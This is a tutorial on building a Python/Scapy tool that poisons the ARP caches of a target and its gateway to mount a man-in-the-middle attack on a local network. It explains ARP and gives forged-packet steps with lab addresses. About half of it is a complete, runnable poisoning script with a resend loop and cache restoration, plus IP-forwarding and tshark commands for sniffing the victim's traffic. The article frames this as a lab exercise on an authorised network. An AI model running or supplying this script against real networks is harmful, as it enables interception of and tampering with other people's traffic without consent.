ARP cache poisoning is one of the most common ways of carrying out a man-in-the-middle (MITM) attack on a local area network. This article demonstrates how to build a Python program that poisons the ARP caches of both the target and the gateway in order to perform a successful MITM attack.
To build the program we first go through the steps of ARP cache poisoning, and then I demonstrate each of them using Scapy. For the demonstration, the attacker's machine is a Kali Linux VM in VirtualBox with a Bridged Adapter, and the target machine runs Windows. Both machines are connected to the same WLAN.
As the name of the attack suggests, we will be poisoning the ARP cache of the target. Each machine on the LAN maintains a local ARP table (cache) that maps IP addresses to MAC addresses. The table is built from the ARP replies the machine receives to the ARP requests it sends.
For example, Machine A (10.0.2.5) wants to communicate with Machine B (10.0.2.6). To do so, Machine A needs Machine B's MAC address, so it first searches its ARP table for an entry for 10.0.2.6. If it finds one, it can send the frame to Machine B right away; otherwise it sends an ARP request to the broadcast address ff:ff:ff:ff:ff:ff. The request reaches every machine on the network, asking which of them has 10.0.2.6. When Machine B sees the request, it sends an ARP reply to Machine A (10.0.2.5) with its MAC address, and Machine A writes that into its local ARP table.
To poison it, we send forged ARP replies with the source IP address (psrc) set to the address we want to impersonate. ARP has no authentication, so the target cannot tell our reply from a genuine one and simply overwrites its cache entry with our MAC address.
Now let's introduce Scapy.
Scapy is a Python program that lets the user send, sniff, dissect and forge network packets. This capability allows building tools that can probe, scan or attack networks.
For installation instructions, see this link.
First, let's get the hang of Scapy. We can sniff, dissect and forge packets with it; as this article is about ARP poisoning, we will only be forging and sending packets.
To see the fields of a layer, call the ls() function on it.
To create a packet we stack layers with the "/" operator, for instance an Ethernet layer over an ARP layer.
To send a packet we use send(); for a frame that carries its own Ethernet header, sendp() sends at layer 2, and srp() does the same but also returns the replies.
Pretty easy, right?
Moving forward, let's get to ARP poisoning.
To see the ARP table on both Windows and Linux, use the command arp -a (on modern Linux, ip neigh shows the same table).
So my lab setup consists of the target machine (192.168.43.65), the attacker machine (192.168.43.220) and the gateway (192.168.43.1). As the attacker I will poison both the target and the gateway, so that traffic in both directions passes through my machine and the MITM sniffing attack succeeds.
! Note: Ensure packet forwarding is enabled on the attacker's machine, otherwise the target's traffic stops at us and the target loses connectivity instead of being sniffed (a noisy denial of service rather than a MITM). To enable it, run as root: echo 1 > /proc/sys/net/ipv4/ip_forward (or sysctl -w net.ipv4.ip_forward=1).
Step 1: Finding out the MAC address of the target and the Gateway
To find the MAC addresses of the target and the gateway, we send an ARP who-has request to the broadcast address for each of them and read the hwsrc field from the reply.
So we design the ARP broadcast request for the gateway, IP address 192.168.43.1 (Ethernet destination ff:ff:ff:ff:ff:ff, ARP pdst set to the gateway's IP), and send it with Scapy's send-and-receive call, srp(), so that we get the reply back.
! Note: In the ARP layer, hwsrc and hwdst are the MAC addresses of source and destination respectively, while psrc and pdst are the IP addresses of source and destination. If hwsrc and psrc are left unset, Scapy fills them in from the sending interface.
Similarly, we find out the MAC address of the target (192.168.43.65).
Step 2: Sending false ARP response packets to both the target and the gateway.
The false ARP reply to the target has pdst='192.168.43.65', hwdst='08:25:25:5c:9d:51' (the target's MAC found in Step 1) and psrc='192.168.43.1', with op=2 (is-at), since Scapy's ARP() defaults to op=1, a who-has request. We leave hwsrc unset, so Scapy fills it with the attacker's MAC address. When the target receives this reply it updates its ARP table, binding the gateway's IP address to our rogue MAC. Cache entries age out and a genuine reply from the gateway would overwrite ours, so to keep the poisoning in place we have to resend the forged replies continuously, which the Python script does.
As we do not need a reply to this packet, send() is enough here.
Similarly, craft a packet for the gateway (192.168.43.1, 84:fd:d1:14:a6:9f) with psrc spoofed to '192.168.43.65', so that the gateway sends the target's traffic to us as well.
Step 3: Once the attack is done, restore the ARP tables of both machines.
To restore them we craft the replies that carry the real bindings: to the target, psrc='192.168.43.1' with hwsrc set to the gateway's real MAC, and to the gateway, psrc='192.168.43.65' with hwsrc set to the target's real MAC, each sent a few times so that the poisoned entries are overwritten. Skipping this step leaves the two machines unable to reach each other until their caches time out.
This is how it can be done step by step in Scapy. That was only to show how Scapy is used; to automate the whole process I have developed a Python script, in which each step becomes a function.
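The article's script is not reproduced on this page, so below is an added example in that shape (one function per step). It is written for this edit and is not the article's own code. It assumes the article's lab addresses, an interface named eth0 (a placeholder to change for your VM), and that Scapy is installed and the script runs as root with ip_forward enabled. The frame builders are plain Python using struct, so the exact bytes of a forged reply can be inspected and checked without a network; the live functions hand those bytes to Scapy (Ether(frame), srp(), sendp()), which also covers the Scapy primitives introduced earlier: stacking an Ether layer over an ARP layer and sending the result.

```python
#!/usr/bin/env python3
# Added example (not the article's script): ARP cache poisoning of a target and
# its gateway, one function per step. Lab addresses are the article's; the
# interface name is an assumption. Live use needs root, Scapy, ip_forward=1,
# and a network you are authorised to test.
import struct
import time

TARGET_IP = "192.168.43.65"   # victim (from the article's lab)
GATEWAY_IP = "192.168.43.1"   # gateway (from the article's lab)
IFACE = "eth0"                # assumption: the attacker's bridged interface

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = "ff:ff:ff:ff:ff:ff"
ZERO_MAC = "00:00:00:00:00:00"


def _mac(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def _ip(ip: str) -> bytes:
    return bytes(int(octet) for octet in ip.split("."))


def build_arp(op: int, hwsrc: str, psrc: str, hwdst: str, pdst: str) -> bytes:
    """Ethernet + ARP frame with the same fields Scapy's Ether()/ARP() expose.
    Requests go to the broadcast MAC; replies are unicast to hwdst."""
    eth_dst = BROADCAST if op == ARP_REQUEST else hwdst
    eth = _mac(eth_dst) + _mac(hwsrc) + struct.pack("!H", ETH_P_ARP)
    # hwtype 1 (Ethernet), ptype 0x0800 (IPv4), hwlen 6, plen 4, opcode
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
    arp += _mac(hwsrc) + _ip(psrc) + _mac(hwdst) + _ip(pdst)
    return eth + arp


def parse_arp(frame: bytes) -> dict:
    """Decode a frame from build_arp() back into its ARP fields."""
    op = struct.unpack("!H", frame[20:22])[0]
    body = frame[22:42]
    mac = lambda b: ":".join(f"{x:02x}" for x in b)
    ip = lambda b: ".".join(str(x) for x in b)
    return {"op": op, "hwsrc": mac(body[0:6]), "psrc": ip(body[6:10]),
            "hwdst": mac(body[10:16]), "pdst": ip(body[16:20])}


def poison_frame(victim_ip, victim_mac, spoofed_ip, attacker_mac) -> bytes:
    """Step 2: an unsolicited is-at reply that binds spoofed_ip to the
    attacker's MAC in the victim's cache (psrc is the IP being impersonated)."""
    return build_arp(ARP_REPLY, attacker_mac, spoofed_ip, victim_mac, victim_ip)


def restore_frame(victim_ip, victim_mac, real_ip, real_mac) -> bytes:
    """Step 3: the reply that should have been in the victim's cache all along."""
    return build_arp(ARP_REPLY, real_mac, real_ip, victim_mac, victim_ip)


# ---- live part: Scapy, root, and an authorised lab are required ----

def get_mac(ip: str, iface: str = IFACE) -> str:
    """Step 1: broadcast a who-has request and take hwsrc from the reply."""
    from scapy.all import ARP, Ether, srp
    ans, _ = srp(Ether(dst=BROADCAST) / ARP(pdst=ip), iface=iface,
                 timeout=2, retry=2, verbose=False)
    if not ans:
        raise RuntimeError(f"no ARP reply from {ip}")
    return ans[0][1][ARP].hwsrc


def main(target_ip=TARGET_IP, gateway_ip=GATEWAY_IP, iface=IFACE, interval=2.0):
    from scapy.all import Ether, get_if_hwaddr, sendp
    my_mac = get_if_hwaddr(iface)
    target_mac, gateway_mac = get_mac(target_ip, iface), get_mac(gateway_ip, iface)
    # Both directions must be poisoned, or we only see half the conversation.
    to_target = Ether(poison_frame(target_ip, target_mac, gateway_ip, my_mac))
    to_gateway = Ether(poison_frame(gateway_ip, gateway_mac, target_ip, my_mac))
    try:
        while True:  # resend so neither entry ages out or gets overwritten
            sendp([to_target, to_gateway], iface=iface, verbose=False)
            time.sleep(interval)
    except KeyboardInterrupt:
        pass
    finally:  # put the real bindings back before leaving
        fix = [Ether(restore_frame(target_ip, target_mac, gateway_ip, gateway_mac)),
               Ether(restore_frame(gateway_ip, gateway_mac, target_ip, target_mac))]
        sendp(fix, iface=iface, count=5, inter=0.5, verbose=False)


if __name__ == "__main__":
    main()
```

Run it as root on the Kali VM with ip_forward already set to 1, and stop it with Ctrl-C; the finally block then resends the real gateway and target bindings five times so both caches recover immediately instead of waiting for the poisoned entries to expire. Because Scapy dissects the raw frame with Ether(frame), you can also print(to_target.show()) before sending to compare the fields with the ARP layer described in Step 2.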
To confirm the MITM is working, run tshark -i <interface> | grep DNS on the attacker's machine; the target's DNS requests should show up passing through. If instead the target simply loses connectivity, check that packet forwarding was enabled.
To learn what other network security tools you can build with Scapy, see the following links: